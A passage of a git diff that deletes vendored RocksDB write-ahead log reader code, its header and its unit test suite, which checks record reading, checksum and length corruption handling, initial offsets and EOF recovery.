-      const uint32_t log_num = DecodeFixed32(header + 7);
-      if (log_num != log_number_) {
-        return kOldRecord;
-      }
-    }
-    if (header_size + length > buffer_.size()) {
-      *drop_size = buffer_.size();
-      buffer_.clear();
-      if (!eof_) {
-        return kBadRecordLen;
-      }
-      // If the end of the file has been reached without reading |length| bytes
-      // of payload, assume the writer died in the middle of writing the record.
-      // Don't report a corruption unless requested.
-      if (*drop_size) {
-        return kBadHeader;
-      }
-      return kEof;
-    }
-
-    if (type == kZeroType && length == 0) {
-      // Skip zero length record without reporting any drops since
-      // such records are produced by the mmap based writing code in
-      // env_posix.cc that preallocates file regions.
-      // NOTE: this should never happen in DB written by new RocksDB versions,
-      // since we turn off mmap writes to manifest and log files
-      buffer_.clear();
-      return kBadRecord;
-    }
-
-    // Check crc
-    if (checksum_) {
-      uint32_t expected_crc = crc32c::Unmask(DecodeFixed32(header));
-      uint32_t actual_crc = crc32c::Value(header + 6, length + header_size - 6);
-      if (actual_crc != expected_crc) {
-        // Drop the rest of the buffer since "length" itself may have
-        // been corrupted and if we trust it, we could find some
-        // fragment of a real log record that just happens to look
-        // like a valid log record.
-        *drop_size = buffer_.size();
-        buffer_.clear();
-        return kBadRecordChecksum;
-      }
-    }
-
-    buffer_.remove_prefix(header_size + length);
-
-    // Skip physical record that started before initial_offset_
-    if (end_of_buffer_offset_ - buffer_.size() - header_size - length <
-        initial_offset_) {
-      result->clear();
-      return kBadRecord;
-    }
-
-    *result = Slice(header + header_size, length);
-    return type;
-  }
-}
-
-}  // namespace log
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/log_reader.h b/thirdparty/rocksdb/db/log_reader.h
deleted file mode 100644
index c6a471c..0000000
--- a/thirdparty/rocksdb/db/log_reader.h
+++ /dev/null
@@ -1,160 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <memory>
-#include <stdint.h>
-
-#include "db/log_format.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-class SequentialFileReader;
-class Logger;
-using std::unique_ptr;
-
-namespace log {
-
-/**
- * Reader is a general purpose log stream reader implementation. The actual job
- * of reading from the device is implemented by the SequentialFile interface.
- *
- * Please see Writer for details on the file and record layout.
- */
-class Reader {
- public:
-  // Interface for reporting errors.
-  class Reporter {
-   public:
-    virtual ~Reporter();
-
-    // Some corruption was detected.  "size" is the approximate number
-    // of bytes dropped due to the corruption.
-    virtual void Corruption(size_t bytes, const Status& status) = 0;
-  };
-
-  // Create a reader that will return log records from "*file".
-  // "*file" must remain live while this Reader is in use.
-  //
-  // If "reporter" is non-nullptr, it is notified whenever some data is
-  // dropped due to a detected corruption.  "*reporter" must remain
-  // live while this Reader is in use.
-  //
-  // If "checksum" is true, verify checksums if available.
-  //
-  // The Reader will start reading at the first record located at physical
-  // position >= initial_offset within the file.
-  Reader(std::shared_ptr<Logger> info_log,
-	 unique_ptr<SequentialFileReader>&& file,
-         Reporter* reporter, bool checksum, uint64_t initial_offset,
-         uint64_t log_num);
-
-  ~Reader();
-
-  // Read the next record into *record.  Returns true if read
-  // successfully, false if we hit end of the input.  May use
-  // "*scratch" as temporary storage.  The contents filled in *record
-  // will only be valid until the next mutating operation on this
-  // reader or the next mutation to *scratch.
-  bool ReadRecord(Slice* record, std::string* scratch,
-                  WALRecoveryMode wal_recovery_mode =
-                      WALRecoveryMode::kTolerateCorruptedTailRecords);
-
-  // Returns the physical offset of the last record returned by ReadRecord.
-  //
-  // Undefined before the first call to ReadRecord.
-  uint64_t LastRecordOffset();
-
-  // returns true if the reader has encountered an eof condition.
-  bool IsEOF() {
-    return eof_;
-  }
-
-  // when we know more data has been written to the file. we can use this
-  // function to force the reader to look again in the file.
-  // Also aligns the file position indicator to the start of the next block
-  // by reading the rest of the data from the EOF position to the end of the
-  // block that was partially read.
-  void UnmarkEOF();
-
-  SequentialFileReader* file() { return file_.get(); }
-
- private:
-  std::shared_ptr<Logger> info_log_;
-  const unique_ptr<SequentialFileReader> file_;
-  Reporter* const reporter_;
-  bool const checksum_;
-  char* const backing_store_;
-  Slice buffer_;
-  bool eof_;   // Last Read() indicated EOF by returning < kBlockSize
-  bool read_error_;   // Error occurred while reading from file
-
-  // Offset of the file position indicator within the last block when an
-  // EOF was detected.
-  size_t eof_offset_;
-
-  // Offset of the last record returned by ReadRecord.
-  uint64_t last_record_offset_;
-  // Offset of the first location past the end of buffer_.
-  uint64_t end_of_buffer_offset_;
-
-  // Offset at which to start looking for the first record to return
-  uint64_t const initial_offset_;
-
-  // which log number this is
-  uint64_t const log_number_;
-
-  // Whether this is a recycled log file
-  bool recycled_;
-
-  // Extend record types with the following special values
-  enum {
-    kEof = kMaxRecordType + 1,
-    // Returned whenever we find an invalid physical record.
-    // Currently there are three situations in which this happens:
-    // * The record has an invalid CRC (ReadPhysicalRecord reports a drop)
-    // * The record is a 0-length record (No drop is reported)
-    // * The record is below constructor's initial_offset (No drop is reported)
-    kBadRecord = kMaxRecordType + 2,
-    // Returned when we fail to read a valid header.
-    kBadHeader = kMaxRecordType + 3,
-    // Returned when we read an old record from a previous user of the log.
-    kOldRecord = kMaxRecordType + 4,
-    // Returned when we get a bad record length
-    kBadRecordLen = kMaxRecordType + 5,
-    // Returned when we get a bad record checksum
-    kBadRecordChecksum = kMaxRecordType + 6,
-  };
-
-  // Skips all blocks that are completely before "initial_offset_".
-  //
-  // Returns true on success. Handles reporting.
-  bool SkipToInitialBlock();
-
-  // Return type, or one of the preceding special values
-  unsigned int ReadPhysicalRecord(Slice* result, size_t* drop_size);
-
-  // Read some more
-  bool ReadMore(size_t* drop_size, int *error);
-
-  // Reports dropped bytes to the reporter.
-  // buffer_ must be updated to remove the dropped bytes prior to invocation.
-  void ReportCorruption(size_t bytes, const char* reason);
-  void ReportDrop(size_t bytes, const Status& reason);
-
-  // No copying allowed
-  Reader(const Reader&);
-  void operator=(const Reader&);
-};
-
-}  // namespace log
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/log_test.cc b/thirdparty/rocksdb/db/log_test.cc
deleted file mode 100644
index 651a1d0..0000000
--- a/thirdparty/rocksdb/db/log_test.cc
+++ /dev/null
@@ -1,739 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-namespace log {
-
-// Construct a string of the specified length made out of the supplied
-// partial string.
-static std::string BigString(const std::string& partial_string, size_t n) {
-  std::string result;
-  while (result.size() < n) {
-    result.append(partial_string);
-  }
-  result.resize(n);
-  return result;
-}
-
-// Construct a string from a number
-static std::string NumberString(int n) {
-  char buf[50];
-  snprintf(buf, sizeof(buf), "%d.", n);
-  return std::string(buf);
-}
-
-// Return a skewed potentially long string
-static std::string RandomSkewedString(int i, Random* rnd) {
-  return BigString(NumberString(i), rnd->Skewed(17));
-}
-
-class LogTest : public ::testing::TestWithParam<int> {
- private:
-  class StringSource : public SequentialFile {
-   public:
-    Slice& contents_;
-    bool force_error_;
-    size_t force_error_position_;
-    bool force_eof_;
-    size_t force_eof_position_;
-    bool returned_partial_;
-    explicit StringSource(Slice& contents) :
-      contents_(contents),
-      force_error_(false),
-      force_error_position_(0),
-      force_eof_(false),
-      force_eof_position_(0),
-      returned_partial_(false) { }
-
-    virtual Status Read(size_t n, Slice* result, char* scratch) override {
-      EXPECT_TRUE(!returned_partial_) << "must not Read() after eof/error";
-
-      if (force_error_) {
-        if (force_error_position_ >= n) {
-          force_error_position_ -= n;
-        } else {
-          *result = Slice(contents_.data(), force_error_position_);
-          contents_.remove_prefix(force_error_position_);
-          force_error_ = false;
-          returned_partial_ = true;
-          return Status::Corruption("read error");
-        }
-      }
-
-      if (contents_.size() < n) {
-        n = contents_.size();
-        returned_partial_ = true;
-      }
-
-      if (force_eof_) {
-        if (force_eof_position_ >= n) {
-          force_eof_position_ -= n;
-        } else {
-          force_eof_ = false;
-          n = force_eof_position_;
-          returned_partial_ = true;
-        }
-      }
-
-      // By using scratch we ensure that caller has control over the
-      // lifetime of result.data()
-      memcpy(scratch, contents_.data(), n);
-      *result = Slice(scratch, n);
-
-      contents_.remove_prefix(n);
-      return Status::OK();
-    }
-
-    virtual Status Skip(uint64_t n) override {
-      if (n > contents_.size()) {
-        contents_.clear();
-        return Status::NotFound("in-memory file skipepd past end");
-      }
-
-      contents_.remove_prefix(n);
-
-      return Status::OK();
-    }
-  };
-
-  class ReportCollector : public Reader::Reporter {
-   public:
-    size_t dropped_bytes_;
-    std::string message_;
-
-    ReportCollector() : dropped_bytes_(0) { }
-    virtual void Corruption(size_t bytes, const Status& status) override {
-      dropped_bytes_ += bytes;
-      message_.append(status.ToString());
-    }
-  };
-
-  std::string& dest_contents() {
-    auto dest =
-      dynamic_cast<test::StringSink*>(writer_.file()->writable_file());
-    assert(dest);
-    return dest->contents_;
-  }
-
-  const std::string& dest_contents() const {
-    auto dest =
-      dynamic_cast<const test::StringSink*>(writer_.file()->writable_file());
-    assert(dest);
-    return dest->contents_;
-  }
-
-  void reset_source_contents() {
-    auto src = dynamic_cast<StringSource*>(reader_.file()->file());
-    assert(src);
-    src->contents_ = dest_contents();
-  }
-
-  Slice reader_contents_;
-  unique_ptr<WritableFileWriter> dest_holder_;
-  unique_ptr<SequentialFileReader> source_holder_;
-  ReportCollector report_;
-  Writer writer_;
-  Reader reader_;
-
-  // Record metadata for testing initial offset functionality
-  static size_t initial_offset_record_sizes_[];
-  uint64_t initial_offset_last_record_offsets_[4];
-
- public:
-  LogTest()
-      : reader_contents_(),
-        dest_holder_(test::GetWritableFileWriter(
-            new test::StringSink(&reader_contents_))),
-        source_holder_(
-            test::GetSequentialFileReader(new StringSource(reader_contents_))),
-        writer_(std::move(dest_holder_), 123, GetParam()),
-        reader_(NULL, std::move(source_holder_), &report_, true /*checksum*/,
-                0 /*initial_offset*/, 123) {
-    int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-    initial_offset_last_record_offsets_[0] = 0;
-    initial_offset_last_record_offsets_[1] = header_size + 10000;
-    initial_offset_last_record_offsets_[2] = 2 * (header_size + 10000);
-    initial_offset_last_record_offsets_[3] = 2 * (header_size + 10000) +
-                                             (2 * log::kBlockSize - 1000) +
-                                             3 * header_size;
-  }
-
-  Slice* get_reader_contents() { return &reader_contents_; }
-
-  void Write(const std::string& msg) {
-    writer_.AddRecord(Slice(msg));
-  }
-
-  size_t WrittenBytes() const {
-    return dest_contents().size();
-  }
-
-  std::string Read(const WALRecoveryMode wal_recovery_mode =
-                       WALRecoveryMode::kTolerateCorruptedTailRecords) {
-    std::string scratch;
-    Slice record;
-    if (reader_.ReadRecord(&record, &scratch, wal_recovery_mode)) {
-      return record.ToString();
-    } else {
-      return "EOF";
-    }
-  }
-
-  void IncrementByte(int offset, int delta) {
-    dest_contents()[offset] += delta;
-  }
-
-  void SetByte(int offset, char new_byte) {
-    dest_contents()[offset] = new_byte;
-  }
-
-  void ShrinkSize(int bytes) {
-    auto dest =
-      dynamic_cast<test::StringSink*>(writer_.file()->writable_file());
-    assert(dest);
-    dest->Drop(bytes);
-  }
-
-  void FixChecksum(int header_offset, int len, bool recyclable) {
-    // Compute crc of type/len/data
-    int header_size = recyclable ? kRecyclableHeaderSize : kHeaderSize;
-    uint32_t crc = crc32c::Value(&dest_contents()[header_offset + 6],
-                                 header_size - 6 + len);
-    crc = crc32c::Mask(crc);
-    EncodeFixed32(&dest_contents()[header_offset], crc);
-  }
-
-  void ForceError(size_t position = 0) {
-    auto src = dynamic_cast<StringSource*>(reader_.file()->file());
-    src->force_error_ = true;
-    src->force_error_position_ = position;
-  }
-
-  size_t DroppedBytes() const {
-    return report_.dropped_bytes_;
-  }
-
-  std::string ReportMessage() const {
-    return report_.message_;
-  }
-
-  void ForceEOF(size_t position = 0) {
-    auto src = dynamic_cast<StringSource*>(reader_.file()->file());
-    src->force_eof_ = true;
-    src->force_eof_position_ = position;
-  }
-
-  void UnmarkEOF() {
-    auto src = dynamic_cast<StringSource*>(reader_.file()->file());
-    src->returned_partial_ = false;
-    reader_.UnmarkEOF();
-  }
-
-  bool IsEOF() {
-    return reader_.IsEOF();
-  }
-
-  // Returns OK iff recorded error message contains "msg"
-  std::string MatchError(const std::string& msg) const {
-    if (report_.message_.find(msg) == std::string::npos) {
-      return report_.message_;
-    } else {
-      return "OK";
-    }
-  }
-
-  void WriteInitialOffsetLog() {
-    for (int i = 0; i < 4; i++) {
-      std::string record(initial_offset_record_sizes_[i],
-                         static_cast<char>('a' + i));
-      Write(record);
-    }
-  }
-
-  void CheckOffsetPastEndReturnsNoRecords(uint64_t offset_past_end) {
-    WriteInitialOffsetLog();
-    unique_ptr<SequentialFileReader> file_reader(
-        test::GetSequentialFileReader(new StringSource(reader_contents_)));
-    unique_ptr<Reader> offset_reader(
-        new Reader(NULL, std::move(file_reader), &report_,
-                   true /*checksum*/, WrittenBytes() + offset_past_end, 123));
-    Slice record;
-    std::string scratch;
-    ASSERT_TRUE(!offset_reader->ReadRecord(&record, &scratch));
-  }
-
-  void CheckInitialOffsetRecord(uint64_t initial_offset,
-                                int expected_record_offset) {
-    WriteInitialOffsetLog();
-    unique_ptr<SequentialFileReader> file_reader(
-        test::GetSequentialFileReader(new StringSource(reader_contents_)));
-    unique_ptr<Reader> offset_reader(
-        new Reader(NULL, std::move(file_reader), &report_,
-                   true /*checksum*/, initial_offset, 123));
-    Slice record;
-    std::string scratch;
-    ASSERT_TRUE(offset_reader->ReadRecord(&record, &scratch));
-    ASSERT_EQ(initial_offset_record_sizes_[expected_record_offset],
-              record.size());
-    ASSERT_EQ(initial_offset_last_record_offsets_[expected_record_offset],
-              offset_reader->LastRecordOffset());
-    ASSERT_EQ((char)('a' + expected_record_offset), record.data()[0]);
-  }
-
-};
-
-size_t LogTest::initial_offset_record_sizes_[] =
-    {10000,  // Two sizable records in first block
-     10000,
-     2 * log::kBlockSize - 1000,  // Span three blocks
-     1};
-
-TEST_P(LogTest, Empty) { ASSERT_EQ("EOF", Read()); }
-
-TEST_P(LogTest, ReadWrite) {
-  Write("foo");
-  Write("bar");
-  Write("");
-  Write("xxxx");
-  ASSERT_EQ("foo", Read());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("", Read());
-  ASSERT_EQ("xxxx", Read());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ("EOF", Read());  // Make sure reads at eof work
-}
-
-TEST_P(LogTest, ManyBlocks) {
-  for (int i = 0; i < 100000; i++) {
-    Write(NumberString(i));
-  }
-  for (int i = 0; i < 100000; i++) {
-    ASSERT_EQ(NumberString(i), Read());
-  }
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, Fragmentation) {
-  Write("small");
-  Write(BigString("medium", 50000));
-  Write(BigString("large", 100000));
-  ASSERT_EQ("small", Read());
-  ASSERT_EQ(BigString("medium", 50000), Read());
-  ASSERT_EQ(BigString("large", 100000), Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, MarginalTrailer) {
-  // Make a trailer that is exactly the same length as an empty record.
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  const int n = kBlockSize - 2 * header_size;
-  Write(BigString("foo", n));
-  ASSERT_EQ((unsigned int)(kBlockSize - header_size), WrittenBytes());
-  Write("");
-  Write("bar");
-  ASSERT_EQ(BigString("foo", n), Read());
-  ASSERT_EQ("", Read());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, MarginalTrailer2) {
-  // Make a trailer that is exactly the same length as an empty record.
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  const int n = kBlockSize - 2 * header_size;
-  Write(BigString("foo", n));
-  ASSERT_EQ((unsigned int)(kBlockSize - header_size), WrittenBytes());
-  Write("bar");
-  ASSERT_EQ(BigString("foo", n), Read());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(0U, DroppedBytes());
-  ASSERT_EQ("", ReportMessage());
-}
-
-TEST_P(LogTest, ShortTrailer) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  const int n = kBlockSize - 2 * header_size + 4;
-  Write(BigString("foo", n));
-  ASSERT_EQ((unsigned int)(kBlockSize - header_size + 4), WrittenBytes());
-  Write("");
-  Write("bar");
-  ASSERT_EQ(BigString("foo", n), Read());
-  ASSERT_EQ("", Read());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, AlignedEof) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  const int n = kBlockSize - 2 * header_size + 4;
-  Write(BigString("foo", n));
-  ASSERT_EQ((unsigned int)(kBlockSize - header_size + 4), WrittenBytes());
-  ASSERT_EQ(BigString("foo", n), Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, RandomRead) {
-  const int N = 500;
-  Random write_rnd(301);
-  for (int i = 0; i < N; i++) {
-    Write(RandomSkewedString(i, &write_rnd));
-  }
-  Random read_rnd(301);
-  for (int i = 0; i < N; i++) {
-    ASSERT_EQ(RandomSkewedString(i, &read_rnd), Read());
-  }
-  ASSERT_EQ("EOF", Read());
-}
-
-// Tests of all the error paths in log_reader.cc follow:
-
-TEST_P(LogTest, ReadError) {
-  Write("foo");
-  ForceError();
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ((unsigned int)kBlockSize, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("read error"));
-}
-
-TEST_P(LogTest, BadRecordType) {
-  Write("foo");
-  // Type is stored in header[6]
-  IncrementByte(6, 100);
-  FixChecksum(0, 3, false);
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("unknown record type"));
-}
-
-TEST_P(LogTest, TruncatedTrailingRecordIsIgnored) {
-  Write("foo");
-  ShrinkSize(4);   // Drop all payload as well as a header byte
-  ASSERT_EQ("EOF", Read());
-  // Truncated last record is ignored, not treated as an error
-  ASSERT_EQ(0U, DroppedBytes());
-  ASSERT_EQ("", ReportMessage());
-}
-
-TEST_P(LogTest, TruncatedTrailingRecordIsNotIgnored) {
-  Write("foo");
-  ShrinkSize(4);  // Drop all payload as well as a header byte
-  ASSERT_EQ("EOF", Read(WALRecoveryMode::kAbsoluteConsistency));
-  // Truncated last record is ignored, not treated as an error
-  ASSERT_GT(DroppedBytes(), 0U);
-  ASSERT_EQ("OK", MatchError("Corruption: truncated header"));
-}
-
-TEST_P(LogTest, BadLength) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  const int kPayloadSize = kBlockSize - header_size;
-  Write(BigString("bar", kPayloadSize));
-  Write("foo");
-  // Least significant size byte is stored in header[4].
-  IncrementByte(4, 1);
-  if (!GetParam()) {
-    ASSERT_EQ("foo", Read());
-    ASSERT_EQ(kBlockSize, DroppedBytes());
-    ASSERT_EQ("OK", MatchError("bad record length"));
-  } else {
-    ASSERT_EQ("EOF", Read());
-  }
-}
-
-TEST_P(LogTest, BadLengthAtEndIsIgnored) {
-  Write("foo");
-  ShrinkSize(1);
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(0U, DroppedBytes());
-  ASSERT_EQ("", ReportMessage());
-}
-
-TEST_P(LogTest, BadLengthAtEndIsNotIgnored) {
-  Write("foo");
-  ShrinkSize(1);
-  ASSERT_EQ("EOF", Read(WALRecoveryMode::kAbsoluteConsistency));
-  ASSERT_GT(DroppedBytes(), 0U);
-  ASSERT_EQ("OK", MatchError("Corruption: truncated header"));
-}
-
-TEST_P(LogTest, ChecksumMismatch) {
-  Write("foooooo");
-  IncrementByte(0, 14);
-  ASSERT_EQ("EOF", Read());
-  if (!GetParam()) {
-    ASSERT_EQ(14U, DroppedBytes());
-    ASSERT_EQ("OK", MatchError("checksum mismatch"));
-  } else {
-    ASSERT_EQ(0U, DroppedBytes());
-    ASSERT_EQ("", ReportMessage());
-  }
-}
-
-TEST_P(LogTest, UnexpectedMiddleType) {
-  Write("foo");
-  SetByte(6, GetParam() ? kRecyclableMiddleType : kMiddleType);
-  FixChecksum(0, 3, !!GetParam());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("missing start"));
-}
-
-TEST_P(LogTest, UnexpectedLastType) {
-  Write("foo");
-  SetByte(6, GetParam() ? kRecyclableLastType : kLastType);
-  FixChecksum(0, 3, !!GetParam());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("missing start"));
-}
-
-TEST_P(LogTest, UnexpectedFullType) {
-  Write("foo");
-  Write("bar");
-  SetByte(6, GetParam() ? kRecyclableFirstType : kFirstType);
-  FixChecksum(0, 3, !!GetParam());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("partial record without end"));
-}
-
-TEST_P(LogTest, UnexpectedFirstType) {
-  Write("foo");
-  Write(BigString("bar", 100000));
-  SetByte(6, GetParam() ? kRecyclableFirstType : kFirstType);
-  FixChecksum(0, 3, !!GetParam());
-  ASSERT_EQ(BigString("bar", 100000), Read());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("partial record without end"));
-}
-
-TEST_P(LogTest, MissingLastIsIgnored) {
-  Write(BigString("bar", kBlockSize));
-  // Remove the LAST block, including header.
-  ShrinkSize(14);
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ("", ReportMessage());
-  ASSERT_EQ(0U, DroppedBytes());
-}
-
-TEST_P(LogTest, MissingLastIsNotIgnored) {
-  Write(BigString("bar", kBlockSize));
-  // Remove the LAST block, including header.
-  ShrinkSize(14);
-  ASSERT_EQ("EOF", Read(WALRecoveryMode::kAbsoluteConsistency));
-  ASSERT_GT(DroppedBytes(), 0U);
-  ASSERT_EQ("OK", MatchError("Corruption: error reading trailing data"));
-}
-
-TEST_P(LogTest, PartialLastIsIgnored) {
-  Write(BigString("bar", kBlockSize));
-  // Cause a bad record length in the LAST block.
-  ShrinkSize(1);
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ("", ReportMessage());
-  ASSERT_EQ(0U, DroppedBytes());
-}
-
-TEST_P(LogTest, PartialLastIsNotIgnored) {
-  Write(BigString("bar", kBlockSize));
-  // Cause a bad record length in the LAST block.
-  ShrinkSize(1);
-  ASSERT_EQ("EOF", Read(WALRecoveryMode::kAbsoluteConsistency));
-  ASSERT_GT(DroppedBytes(), 0U);
-  ASSERT_EQ("OK", MatchError(
-                      "Corruption: truncated headerCorruption: "
-                      "error reading trailing data"));
-}
-
-TEST_P(LogTest, ErrorJoinsRecords) {
-  // Consider two fragmented records:
-  //    first(R1) last(R1) first(R2) last(R2)
-  // where the middle two fragments disappear.  We do not want
-  // first(R1),last(R2) to get joined and returned as a valid record.
-
-  // Write records that span two blocks
-  Write(BigString("foo", kBlockSize));
-  Write(BigString("bar", kBlockSize));
-  Write("correct");
-
-  // Wipe the middle block
-  for (unsigned int offset = kBlockSize; offset < 2*kBlockSize; offset++) {
-    SetByte(offset, 'x');
-  }
-
-  if (!GetParam()) {
-    ASSERT_EQ("correct", Read());
-    ASSERT_EQ("EOF", Read());
-    size_t dropped = DroppedBytes();
-    ASSERT_LE(dropped, 2 * kBlockSize + 100);
-    ASSERT_GE(dropped, 2 * kBlockSize);
-  } else {
-    ASSERT_EQ("EOF", Read());
-  }
-}
-
-TEST_P(LogTest, ReadStart) { CheckInitialOffsetRecord(0, 0); }
-
-TEST_P(LogTest, ReadSecondOneOff) { CheckInitialOffsetRecord(1, 1); }
-
-TEST_P(LogTest, ReadSecondTenThousand) { CheckInitialOffsetRecord(10000, 1); }
-
-TEST_P(LogTest, ReadSecondStart) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  CheckInitialOffsetRecord(10000 + header_size, 1);
-}
-
-TEST_P(LogTest, ReadThirdOneOff) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  CheckInitialOffsetRecord(10000 + header_size + 1, 2);
-}
-
-TEST_P(LogTest, ReadThirdStart) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  CheckInitialOffsetRecord(20000 + 2 * header_size, 2);
-}
-
-TEST_P(LogTest, ReadFourthOneOff) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  CheckInitialOffsetRecord(20000 + 2 * header_size + 1, 3);
-}
-
-TEST_P(LogTest, ReadFourthFirstBlockTrailer) {
-  CheckInitialOffsetRecord(log::kBlockSize - 4, 3);
-}
-
-TEST_P(LogTest, ReadFourthMiddleBlock) {
-  CheckInitialOffsetRecord(log::kBlockSize + 1, 3);
-}
-
-TEST_P(LogTest, ReadFourthLastBlock) {
-  CheckInitialOffsetRecord(2 * log::kBlockSize + 1, 3);
-}
-
-TEST_P(LogTest, ReadFourthStart) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  CheckInitialOffsetRecord(
-      2 * (header_size + 1000) + (2 * log::kBlockSize - 1000) + 3 * header_size,
-      3);
-}
-
-TEST_P(LogTest, ReadEnd) { CheckOffsetPastEndReturnsNoRecords(0); }
-
-TEST_P(LogTest, ReadPastEnd) { CheckOffsetPastEndReturnsNoRecords(5); }
-
-TEST_P(LogTest, ClearEofSingleBlock) {
-  Write("foo");
-  Write("bar");
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  ForceEOF(3 + header_size + 2);
-  ASSERT_EQ("foo", Read());
-  UnmarkEOF();
-  ASSERT_EQ("bar", Read());
-  ASSERT_TRUE(IsEOF());
-  ASSERT_EQ("EOF", Read());
-  Write("xxx");
-  UnmarkEOF();
-  ASSERT_EQ("xxx", Read());
-  ASSERT_TRUE(IsEOF());
-}
-
-TEST_P(LogTest, ClearEofMultiBlock) {
-  size_t num_full_blocks = 5;
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  size_t n = (kBlockSize - header_size) * num_full_blocks + 25;
-  Write(BigString("foo", n));
-  Write(BigString("bar", n));
-  ForceEOF(n + num_full_blocks * header_size + header_size + 3);
-  ASSERT_EQ(BigString("foo", n), Read());
-  ASSERT_TRUE(IsEOF());
-  UnmarkEOF();
-  ASSERT_EQ(BigString("bar", n), Read());
-  ASSERT_TRUE(IsEOF());
-  Write(BigString("xxx", n));
-  UnmarkEOF();
-  ASSERT_EQ(BigString("xxx", n), Read());
-  ASSERT_TRUE(IsEOF());
-}
-
-TEST_P(LogTest, ClearEofError) {
-  // If an error occurs during Read() in UnmarkEOF(), the records contained
-  // in the buffer should be returned on subsequent calls of ReadRecord()
-  // until no more full records are left, whereafter ReadRecord() should return
-  // false to indicate that it cannot read any further.
-
-  Write("foo");
-  Write("bar");
-  UnmarkEOF();
-  ASSERT_EQ("foo", Read());
-  ASSERT_TRUE(IsEOF());
-  Write("xxx");
-  ForceError(0);
-  UnmarkEOF();
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, ClearEofError2) {
-  Write("foo");
-  Write("bar");
-  UnmarkEOF();
-  ASSERT_EQ("foo", Read());
-  Write("xxx");
-  ForceError(3);
-  UnmarkEOF();
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("read error"));
-}
-
-TEST_P(LogTest, Recycle) {
-  if (!GetParam()) {
-    return;  // test is only valid for recycled logs
-  }
-  Write("foo");
-  Write("bar");
-  Write("baz");
-  Write("bif");
-  Write("blitz");
-  while (get_reader_contents()->size() < log::kBlockSize * 2) {
-    Write("xxxxxxxxxxxxxxxx");
-  }
-  unique_ptr<WritableFileWriter> dest_holder(test::GetWritableFileWriter(
-      new test::OverwritingStringSink(get_reader_contents())));
-  Writer recycle_writer(std::move(dest_holder), 123, true);
-  recycle_writer.AddRecord(Slice("foooo"));
-  recycle_writer.AddRecord(Slice("bar"));
-  ASSERT_GE(get_reader_contents()->size(), log::kBlockSize * 2);
-  ASSERT_EQ("foooo", Read());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-INSTANTIATE_TEST_CASE_P(bool, LogTest, ::testing::Values(0, 2));
-
-}  // namespace log
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
